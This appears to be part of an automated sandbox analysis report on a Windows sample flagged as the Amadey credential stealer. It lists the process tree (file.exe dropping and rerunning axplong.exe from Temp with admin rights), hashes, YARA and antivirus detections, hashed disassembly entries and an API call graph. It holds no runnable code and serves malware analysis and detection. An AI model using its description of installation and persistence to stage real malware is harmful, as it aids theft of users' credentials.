                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:19:42:07
                    Start date:26/09/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x660000
                    File size:1'874'944 bytes
                    MD5 hash:B6041E0FE108DB5E8ADDCF6D6B4DA4BF
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1445064913.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1485335503.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:2
                    Start time:19:42:09
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Imagebase:0x8a0000
                    File size:1'874'944 bytes
                    MD5 hash:B6041E0FE108DB5E8ADDCF6D6B4DA4BF
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1476249631.0000000005090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1518475574.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 53%, ReversingLabs
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:3
                    Start time:19:42:10
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Imagebase:0x8a0000
                    File size:1'874'944 bytes
                    MD5 hash:B6041E0FE108DB5E8ADDCF6D6B4DA4BF
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.1475590462.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.1519199500.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:8
                    Start time:19:43:00
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Imagebase:0x8a0000
                    File size:1'874'944 bytes
                    MD5 hash:B6041E0FE108DB5E8ADDCF6D6B4DA4BF
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000003.1978884229.0000000005090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Disassembly

                    Reset < >

                      Executed Functions

                      Function 04DA0DD4 Relevance: .2, Instructions: 151COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493830409.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4da0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f7e626b24e73f62413a2cb3236cee2ee79d1a2025ead82357dd3c5a309e5878d
                      • Instruction ID: 609e75b0f9fc20bf7bf8aee2604ac499754f5eb0c7edec100719664f8737371f
                      • Opcode Fuzzy Hash: f7e626b24e73f62413a2cb3236cee2ee79d1a2025ead82357dd3c5a309e5878d
                      • Instruction Fuzzy Hash: 0EF049E730D111BDB603CE51AB50AFB675CE6D6730331C827F487C5402E2186A6A7132
                      Function 04DA0D63 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493830409.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4da0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: a
                      • API String ID: 0-3904355907
                      • Opcode ID: 0891b1cc0f1d9f956691d028f78eb291468ee81890de4bf462d9159e97d28f82
                      • Instruction ID: 50298287e50f83adc3554885f9011e4b6e65982574e517577324f2fd7761e63d
                      • Opcode Fuzzy Hash: 0891b1cc0f1d9f956691d028f78eb291468ee81890de4bf462d9159e97d28f82
                      • Instruction Fuzzy Hash: 2511DAF720D2506FF702DA506E646FB77ADD6C6730730846AF842C7542E2986E596232
                      Function 04DA0E71 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493830409.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4da0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: kXPR
                      • API String ID: 0-2417147290
                      • Opcode ID: d3f645e44b29cde291024b9ec5c934609aa42e604037b385107971b5b40dd075
                      • Instruction ID: e4f9c18aa1c2bd5feb68f3f6a8cc27fdfa96829e36c952ddfe684e52602a616d
                      • Opcode Fuzzy Hash: d3f645e44b29cde291024b9ec5c934609aa42e604037b385107971b5b40dd075
                      • Instruction Fuzzy Hash: D3F02BE774C2516DB713DDF16A545F73B6AFAD39707304C29F482C1801E549AB197031
                      Function 04DA0E33 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493830409.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4da0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: kXPR
                      • API String ID: 0-2417147290
                      • Opcode ID: cea36a0136b208e42d0ef4feb890819179974c5dea9f8025cd794e0a39d68608
                      • Instruction ID: daac5fafd379a0065f4479b8b050d3d99fe7a60fa3a3d3df8b0e2117666e9b53
                      • Opcode Fuzzy Hash: cea36a0136b208e42d0ef4feb890819179974c5dea9f8025cd794e0a39d68608
                      • Instruction Fuzzy Hash: 50D0A7EF709005BD7A02DDF1AA586FF3B4DF5C09317714C26F841C5400E1048A5620B5
                      Function 04DA0D2C Relevance: .1, Instructions: 114COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493830409.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4da0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 244cf5075bd4ef7154053562a67a9c2def072d38e7fee54dcb043efedfe65850
                      • Instruction ID: 3656ae4243533020d075af30f5a076f5c1cf69eea004435fe41d7d96e422bf3b
                      • Opcode Fuzzy Hash: 244cf5075bd4ef7154053562a67a9c2def072d38e7fee54dcb043efedfe65850
                      • Instruction Fuzzy Hash: 59210CE730D2806EF7038A605E646F67B6DD6C373073544ABE442CB543E6589D459332
                      Function 04DA0D5C Relevance: .1, Instructions: 90COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493830409.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4da0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9deb3b1ac43f428ea594d95cb8feaf03b380992a5af54f5e23ac1bb8c2f82874
                      • Instruction ID: 5777fccd1afe691311ffbefd71186bd3dd6b2e769066a0c068a8064d8da79cb9
                      • Opcode Fuzzy Hash: 9deb3b1ac43f428ea594d95cb8feaf03b380992a5af54f5e23ac1bb8c2f82874
                      • Instruction Fuzzy Hash: 7011C4E730C1407EB603CA516F20AF7676DD6C67307318866F846C6542E6A8AE596132
                      Function 04DA0D90 Relevance: .1, Instructions: 78COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493830409.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4da0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9844452e6899b4ac9fac6e0dc4b4d25ed566e2abd0f241453a8556ec4d0783ec
                      • Instruction ID: cc75e5e2dbb5e22ee60f82d5cdcaaab99641de733ff114751d8ceb8ae0ad83ce
                      • Opcode Fuzzy Hash: 9844452e6899b4ac9fac6e0dc4b4d25ed566e2abd0f241453a8556ec4d0783ec
                      • Instruction Fuzzy Hash: BA11E9F720C1406EB703CA516B207FB7BACD6C6730731886BF446CB142E6A4AA596632
                      Function 04DA0D9C Relevance: .1, Instructions: 76COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493830409.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4da0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 39639cac52fe43f2133f92ac2ae1176f53f15d6181a098480716b8a54352ca7d
                      • Instruction ID: 34ba6991c6449990c8754388b8e61c2f4a92ac158e78a93d51aef09699d14f0b
                      • Opcode Fuzzy Hash: 39639cac52fe43f2133f92ac2ae1176f53f15d6181a098480716b8a54352ca7d
                      • Instruction Fuzzy Hash: 0E01DBF730D2406EF603CA516B606FB679DD6C6730731C867F846C7142E6946E596232
                      Function 04DA0E03 Relevance: .0, Instructions: 44COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493830409.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4da0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 141b4a415bca0c868b9fe8e1f130b7730952f92692ad02a85d1232a8a0fc0371
                      • Instruction ID: 16b90e50531a85a1cd9ee542ec3f3c5f59781286135bf7707649b75d1dc34371
                      • Opcode Fuzzy Hash: 141b4a415bca0c868b9fe8e1f130b7730952f92692ad02a85d1232a8a0fc0371
                      • Instruction Fuzzy Hash: 89E0DFE730D521BD7643CA917F68AFB279CE0C5731330882BF842C8402EA499F6A7032
                      Function 04DA0DEE Relevance: .0, Instructions: 42COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493830409.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4da0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9c10d09d2a0f8e079745aba9e4d1637b9522e568c3c33fdd3c0826bf37a4dca0
                      • Instruction ID: ee86104d68e62e9af1422667412b0f46f6d2113c963a1ef5b46c56f0cd1fa8f8
                      • Opcode Fuzzy Hash: 9c10d09d2a0f8e079745aba9e4d1637b9522e568c3c33fdd3c0826bf37a4dca0
                      • Instruction Fuzzy Hash: EFE0EDF770D115BD7602CE91BF54AFB67ACE5C8B30770882BF846C6401E6545E697131
                      Function 04DA0E1F Relevance: .0, Instructions: 28COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493830409.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4da0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1c65980c3b963e0cf4b6d820ab34867c05bcd753281526f41c66298025664b70
                      • Instruction ID: e6b3148edc3ab9d6a8690bcb2da72aa0abd0e61d8d599e85662f8fb5a17b7d8f
                      • Opcode Fuzzy Hash: 1c65980c3b963e0cf4b6d820ab34867c05bcd753281526f41c66298025664b70
                      • Instruction Fuzzy Hash: 71D0C7AB30D000BE7A428EA0BA20ABB2BACE0C82303308C6BF842C2401D6148A207231
                      Function 04DA0E54 Relevance: .0, Instructions: 13COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493830409.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4da0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 419d617193cea1dbd55cd61b48468fe5082b85ec7ba11024b2ed1f897fd03766
                      • Instruction ID: f5625058aaa7a0eea2918898a4cfa0a0e82228787b8a88838674c6c4d8c4c2b5
                      • Opcode Fuzzy Hash: 419d617193cea1dbd55cd61b48468fe5082b85ec7ba11024b2ed1f897fd03766
                      • Instruction Fuzzy Hash: FFB02BAE31010CED89027EB1608812E37D0E2C42213F00920E000C5800C57412438220

                      Execution Graph

                      Execution Coverage:8.8%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:6.5%
                      Total number of Nodes:541
                      Total number of Limit Nodes:23
                      execution_graph 12119 8bb7e9 12126 8bb6e5 12119->12126 12121 8bb811 Concurrency::details::_Reschedule_chore 12123 8bb836 12121->12123 12134 8bcade 12121->12134 12138 8bb648 12123->12138 12125 8bb84e 12127 8bb6f1 Concurrency::details::_Reschedule_chore 12126->12127 12128 8bb722 12127->12128 12129 8bc5dc GetSystemTimePreciseAsFileTime 12127->12129 12128->12121 12130 8bb706 12129->12130 12148 8a2ad0 12130->12148 12132 8bb70c __Mtx_unlock 12133 8a2ad0 7 API calls 12132->12133 12133->12128 12135 8bcafc 12134->12135 12136 8bcaec TpCallbackUnloadDllOnCompletion 12134->12136 12135->12123 12136->12135 12139 8bb654 Concurrency::details::_Reschedule_chore 12138->12139 12140 8bb6ae 12139->12140 12141 8bc5dc GetSystemTimePreciseAsFileTime 12139->12141 12140->12125 12142 8bb669 12141->12142 12143 8a2ad0 7 API calls 12142->12143 12144 8bb66f __Mtx_unlock 12143->12144 12145 8a2ad0 7 API calls 12144->12145 12146 8bb68c __Cnd_broadcast 12145->12146 12146->12140 12147 8a2ad0 7 API calls 12146->12147 12147->12140 12149 8a2ada 12148->12149 12150 8a2adc 12148->12150 12149->12132 12151 8bc19a 7 API calls 12150->12151 12152 8a2ae2 ___std_exception_copy 12151->12152 12152->12132 11825 8d6beb 11832 8d6bf7 11825->11832 11827 8d6c26 11828 8d6c35 11827->11828 11829 8d6c43 11827->11829 11830 8d6c99 6 API calls 11828->11830 11843 8d68bd 11829->11843 11833 8d6c3f 11830->11833 11837 8d8aaf 11832->11837 11834 8d6c5d 11835 8d6c71 ___free_lconv_mon 11834->11835 11846 8d6c99 11834->11846 11838 8d8ab4 __cftof 11837->11838 11841 8d8abf 11838->11841 11858 8dd4f4 11838->11858 11855 8d651d 11841->11855 11842 8d8af2 __cftof __dosmaperr 11842->11827 11875 8d683a 11843->11875 11845 8d68cf 11845->11834 11847 8d6cc4 __cftof 11846->11847 11853 8d6ca7 __cftof __dosmaperr 11846->11853 11848 8d6d06 CreateFileW 11847->11848 11854 8d6cea __cftof __dosmaperr 11847->11854 11849 8d6d38 11848->11849 11850 8d6d2a 11848->11850 11923 8d6d77 11849->11923 11911 8d6e01 GetFileType 11850->11911 11853->11835 11854->11835 11863 8d63f7 11855->11863 11859 8dd500 __cftof 11858->11859 11860 8d651d __cftof 2 API calls 11859->11860 11861 8dd55c __cftof __dosmaperr 11859->11861 11862 8dd6ee __cftof __dosmaperr 11860->11862 11861->11841 11862->11841 11866 8d6405 __cftof 11863->11866 11864 8d6450 11864->11842 11866->11864 11868 8d645b 11866->11868 11873 8da1c2 GetPEB 11868->11873 11870 8d6465 11871 8d646a GetPEB 11870->11871 11872 8d647a __cftof 11870->11872 11871->11872 11874 8da1dc __cftof 11873->11874 11874->11870 11876 8d6851 11875->11876 11877 8d685a 11875->11877 11876->11845 11877->11876 11881 8db4bb 11877->11881 11882 8db4ce 11881->11882 11883 8d6890 11881->11883 11882->11883 11889 8df46b 11882->11889 11885 8db4e8 11883->11885 11886 8db4fb 11885->11886 11887 8db510 11885->11887 11886->11887 11894 8de571 11886->11894 11887->11876 11890 8df477 __cftof 11889->11890 11891 8df4c6 11890->11891 11892 8d8aaf __cftof 2 API calls 11890->11892 11891->11883 11893 8df4eb 11892->11893 11895 8de57b 11894->11895 11898 8de489 11895->11898 11897 8de581 11897->11887 11902 8de495 __cftof ___free_lconv_mon 11898->11902 11899 8de4b6 11899->11897 11900 8d8aaf __cftof 2 API calls 11901 8de528 11900->11901 11903 8de564 11901->11903 11907 8da5ee 11901->11907 11902->11899 11902->11900 11903->11897 11908 8da611 11907->11908 11909 8d8aaf __cftof 2 API calls 11908->11909 11910 8da687 11909->11910 11912 8d6e3c __cftof 11911->11912 11922 8d6ed2 __dosmaperr 11911->11922 11913 8d6e75 GetFileInformationByHandle 11912->11913 11912->11922 11914 8d6e8b 11913->11914 11913->11922 11928 8d70c9 11914->11928 11918 8d6ea8 11919 8d6f71 SystemTimeToTzSpecificLocalTime 11918->11919 11920 8d6ebb 11919->11920 11921 8d6f71 SystemTimeToTzSpecificLocalTime 11920->11921 11921->11922 11922->11854 11924 8d6d85 11923->11924 11925 8d70c9 2 API calls 11924->11925 11926 8d6d8a __dosmaperr 11924->11926 11927 8d6da3 11925->11927 11926->11854 11927->11854 11930 8d70df _wcsrchr 11928->11930 11929 8d6e97 11938 8d6f71 11929->11938 11930->11929 11942 8db9e4 11930->11942 11932 8d7123 11932->11929 11933 8db9e4 2 API calls 11932->11933 11934 8d7134 11933->11934 11934->11929 11935 8db9e4 2 API calls 11934->11935 11936 8d7145 11935->11936 11936->11929 11937 8db9e4 2 API calls 11936->11937 11937->11929 11939 8d6f89 11938->11939 11940 8d6fa9 SystemTimeToTzSpecificLocalTime 11939->11940 11941 8d6f8f 11939->11941 11940->11941 11941->11918 11943 8db9f2 11942->11943 11946 8db9f8 __cftof __dosmaperr 11943->11946 11947 8dba2d 11943->11947 11945 8dba28 11945->11932 11946->11932 11948 8dba57 11947->11948 11951 8dba3d __cftof __dosmaperr 11947->11951 11949 8d683a __cftof 2 API calls 11948->11949 11948->11951 11952 8dba81 11949->11952 11950 8db9a5 GetPEB GetPEB 11950->11952 11951->11945 11952->11950 11952->11951 12279 8a7400 12280 8a7435 shared_ptr 12279->12280 12284 8a752f shared_ptr 12280->12284 12285 8bd041 12280->12285 12282 8a75bd 12282->12284 12289 8bcff7 12282->12289 12286 8bd052 12285->12286 12288 8bd05a 12286->12288 12293 8bd0c9 12286->12293 12288->12282 12290 8bd007 12289->12290 12291 8bd0af 12290->12291 12292 8bd0ab RtlWakeAllConditionVariable 12290->12292 12291->12284 12292->12284 12294 8bd0d7 SleepConditionVariableCS 12293->12294 12296 8bd0f0 12293->12296 12294->12296 12296->12286 12153 8b6ae0 12154 8b6b10 12153->12154 12157 8b46c0 12154->12157 12156 8b6b5c Sleep 12156->12154 12160 8b46fb 12157->12160 12173 8b4d80 shared_ptr 12157->12173 12158 8b4e69 shared_ptr 12158->12156 12161 8abd60 5 API calls 12160->12161 12160->12173 12172 8b4753 shared_ptr __dosmaperr 12161->12172 12162 8b4fee shared_ptr 12193 8a7d00 12162->12193 12163 8b4f25 shared_ptr 12163->12162 12167 8b6ab6 12163->12167 12165 8b4ffd 12199 8a82b0 12165->12199 12169 8b46c0 13 API calls 12167->12169 12168 8b4a0d 12171 8abd60 5 API calls 12168->12171 12168->12173 12170 8b6b5c Sleep 12169->12170 12170->12167 12175 8b4a72 shared_ptr 12171->12175 12172->12168 12174 8d8979 2 API calls 12172->12174 12173->12158 12185 8a65b0 12173->12185 12174->12168 12175->12173 12178 8b42a0 12175->12178 12177 8b5016 shared_ptr 12177->12156 12179 8b42e2 12178->12179 12181 8b4556 12179->12181 12183 8b4308 shared_ptr 12179->12183 12180 8b4520 shared_ptr 12180->12173 12182 8b3550 11 API calls 12181->12182 12182->12180 12183->12180 12203 8b3550 12183->12203 12186 8a660f 12185->12186 12187 8a2280 2 API calls 12186->12187 12188 8a6699 shared_ptr 12187->12188 12189 8a2280 2 API calls 12188->12189 12190 8a6822 shared_ptr 12188->12190 12191 8a6727 shared_ptr 12189->12191 12190->12163 12191->12190 12192 8a2280 2 API calls 12191->12192 12192->12191 12195 8a7d66 shared_ptr __cftof 12193->12195 12194 8a7ea3 GetNativeSystemInfo 12196 8a7ea7 12194->12196 12195->12194 12195->12196 12198 8a7eb8 shared_ptr 12195->12198 12196->12198 12276 8d8a81 12196->12276 12198->12165 12200 8a8315 shared_ptr __cftof 12199->12200 12201 8a8454 GetNativeSystemInfo 12200->12201 12202 8a8333 12200->12202 12201->12202 12202->12177 12204 8b358f shared_ptr 12203->12204 12208 8b3ab2 shared_ptr std::_Xinvalid_argument 12203->12208 12204->12208 12210 8b38f5 shared_ptr __dosmaperr 12204->12210 12214 8aaca0 12204->12214 12205 8d8979 2 API calls 12207 8b3a8a 12205->12207 12207->12208 12209 8b3e52 12207->12209 12212 8b3b9d 12207->12212 12208->12183 12234 8b2e20 12209->12234 12210->12205 12210->12208 12219 8b1dd0 12212->12219 12216 8aadf0 __cftof 12214->12216 12215 8aae16 shared_ptr 12215->12210 12216->12215 12249 8a5500 12216->12249 12218 8aaf7e 12222 8b1e6b shared_ptr __dosmaperr 12219->12222 12220 8ae440 5 API calls 12221 8b2936 shared_ptr std::_Xinvalid_argument 12220->12221 12221->12208 12222->12221 12223 8d8979 2 API calls 12222->12223 12229 8b1e78 12222->12229 12224 8b2265 shared_ptr 12223->12224 12224->12221 12225 8d66e7 2 API calls 12224->12225 12224->12229 12226 8b268b shared_ptr __dosmaperr 12225->12226 12226->12221 12227 8d8979 2 API calls 12226->12227 12228 8b2759 12227->12228 12228->12221 12228->12229 12230 8b27d1 12228->12230 12229->12220 12231 8ae440 5 API calls 12230->12231 12232 8b2843 12231->12232 12232->12221 12233 8a5df0 2 API calls 12232->12233 12233->12221 12235 8b2ec5 __cftof 12234->12235 12236 8b32f2 InternetCloseHandle InternetCloseHandle 12235->12236 12237 8b3331 12236->12237 12238 8ae440 5 API calls 12237->12238 12239 8b3423 shared_ptr 12238->12239 12241 8aaca0 2 API calls 12239->12241 12243 8b351a shared_ptr std::_Xinvalid_argument 12239->12243 12245 8b38f5 shared_ptr __dosmaperr 12239->12245 12240 8d8979 2 API calls 12242 8b3a8a 12240->12242 12241->12245 12242->12243 12244 8b3b9d 12242->12244 12246 8b3e52 12242->12246 12243->12208 12248 8b1dd0 9 API calls 12244->12248 12245->12240 12245->12243 12247 8b2e20 9 API calls 12246->12247 12247->12243 12248->12243 12250 8a5520 12249->12250 12252 8a5620 12250->12252 12253 8a2280 12250->12253 12252->12218 12256 8a2240 12253->12256 12257 8a2256 12256->12257 12260 8d8667 12257->12260 12263 8d7456 12260->12263 12262 8a2264 12262->12250 12264 8d7496 12263->12264 12268 8d747e __cftof __dosmaperr 12263->12268 12265 8d683a __cftof 2 API calls 12264->12265 12264->12268 12266 8d74ae 12265->12266 12269 8d7a11 12266->12269 12268->12262 12271 8d7a22 12269->12271 12270 8d7a31 __cftof __dosmaperr 12270->12268 12271->12270 12272 8d7fb5 GetPEB GetPEB 12271->12272 12273 8d7c0f GetPEB GetPEB 12271->12273 12274 8d7c35 GetPEB GetPEB 12271->12274 12275 8d7d83 GetPEB GetPEB 12271->12275 12272->12271 12273->12271 12274->12271 12275->12271 12277 8d86d7 2 API calls 12276->12277 12278 8d8a9f 12277->12278 12278->12198 12297 8b8700 12298 8b875a __cftof 12297->12298 12304 8b9ae0 12298->12304 12300 8b8784 12303 8b879c 12300->12303 12308 8a43b0 12300->12308 12302 8b8809 std::_Throw_future_error 12305 8b9b15 12304->12305 12314 8a2ca0 12305->12314 12307 8b9b46 12307->12300 12309 8bbe0f InitOnceExecuteOnce 12308->12309 12310 8a43ca 12309->12310 12311 8a43d1 12310->12311 12312 8d6beb 6 API calls 12310->12312 12311->12302 12313 8a43e4 12312->12313 12315 8a2cdd 12314->12315 12316 8bbe0f InitOnceExecuteOnce 12315->12316 12317 8a2d06 12316->12317 12318 8a2d11 12317->12318 12319 8a2d48 12317->12319 12323 8bbe27 12317->12323 12318->12307 12330 8a2400 12319->12330 12324 8bbe33 std::_Throw_future_error 12323->12324 12325 8bbe9a 12324->12325 12326 8bbea3 12324->12326 12333 8bbdaf 12325->12333 12328 8a2aa0 7 API calls 12326->12328 12329 8bbe9f 12328->12329 12329->12319 12351 8bb506 12330->12351 12332 8a2432 12334 8bcb61 InitOnceExecuteOnce 12333->12334 12335 8bbdc7 12334->12335 12336 8bbdce 12335->12336 12339 8d6beb 12335->12339 12336->12329 12338 8bbdd7 12338->12329 12346 8d6bf7 12339->12346 12340 8d8aaf __cftof 2 API calls 12341 8d6c26 12340->12341 12342 8d6c35 12341->12342 12343 8d6c43 12341->12343 12344 8d6c99 6 API calls 12342->12344 12345 8d68bd 2 API calls 12343->12345 12347 8d6c3f 12344->12347 12348 8d6c5d 12345->12348 12346->12340 12347->12338 12349 8d6c71 ___free_lconv_mon 12348->12349 12350 8d6c99 6 API calls 12348->12350 12349->12338 12350->12349 12353 8bb521 std::_Throw_future_error 12351->12353 12352 8d8aaf __cftof 2 API calls 12354 8bb5cf 12352->12354 12353->12352 12355 8bb588 __cftof 12353->12355 12355->12332 12372 8ba140 12373 8ba1c0 12372->12373 12379 8b7040 12373->12379 12375 8ba3ee shared_ptr 12376 8ba1fc shared_ptr 12376->12375 12383 8a3ea0 12376->12383 12378 8ba3d6 12380 8b7081 __cftof __Mtx_init_in_situ 12379->12380 12382 8b72b6 12380->12382 12389 8a2e80 12380->12389 12382->12376 12384 8a3f08 12383->12384 12388 8a3ede 12383->12388 12386 8a3f18 12384->12386 12432 8a2bc0 12384->12432 12386->12378 12388->12378 12390 8a2ec6 12389->12390 12394 8a2f2f 12389->12394 12391 8bc5dc GetSystemTimePreciseAsFileTime 12390->12391 12392 8a2ed2 12391->12392 12395 8a2fde 12392->12395 12399 8a2edd __Mtx_unlock 12392->12399 12393 8a2faf 12393->12382 12394->12393 12400 8bc5dc GetSystemTimePreciseAsFileTime 12394->12400 12396 8bc19a 7 API calls 12395->12396 12397 8a2fe4 12396->12397 12398 8bc19a 7 API calls 12397->12398 12401 8a2f79 12398->12401 12399->12394 12399->12397 12400->12401 12402 8bc19a 7 API calls 12401->12402 12403 8a2f80 __Mtx_unlock 12401->12403 12402->12403 12404 8bc19a 7 API calls 12403->12404 12405 8a2f98 __Cnd_broadcast 12403->12405 12404->12405 12405->12393 12406 8bc19a 7 API calls 12405->12406 12407 8a2ffc 12406->12407 12408 8bc5dc GetSystemTimePreciseAsFileTime 12407->12408 12418 8a3040 shared_ptr __Mtx_unlock 12408->12418 12409 8a3185 12410 8bc19a 7 API calls 12409->12410 12411 8a318b 12410->12411 12412 8bc19a 7 API calls 12411->12412 12413 8a3191 12412->12413 12414 8bc19a 7 API calls 12413->12414 12420 8a3153 __Mtx_unlock 12414->12420 12415 8a3167 12415->12382 12416 8bc19a 7 API calls 12417 8a319d 12416->12417 12418->12409 12418->12411 12418->12415 12419 8bc5dc GetSystemTimePreciseAsFileTime 12418->12419 12422 8a311f 12419->12422 12420->12415 12420->12416 12422->12409 12422->12413 12422->12420 12423 8bbc7c 12422->12423 12426 8bbaa2 12423->12426 12425 8bbc8c 12425->12422 12427 8bbacc 12426->12427 12428 8bce9b _xtime_get GetSystemTimePreciseAsFileTime 12427->12428 12431 8bbad4 __Xtime_diff_to_millis2 12427->12431 12429 8bbaff __Xtime_diff_to_millis2 12428->12429 12430 8bce9b _xtime_get GetSystemTimePreciseAsFileTime 12429->12430 12429->12431 12430->12431 12431->12425 12433 8a2bce 12432->12433 12439 8bb777 12433->12439 12435 8a2c02 12436 8a2c09 12435->12436 12445 8a2c40 12435->12445 12436->12378 12438 8a2c18 std::_Throw_future_error 12440 8bb784 12439->12440 12443 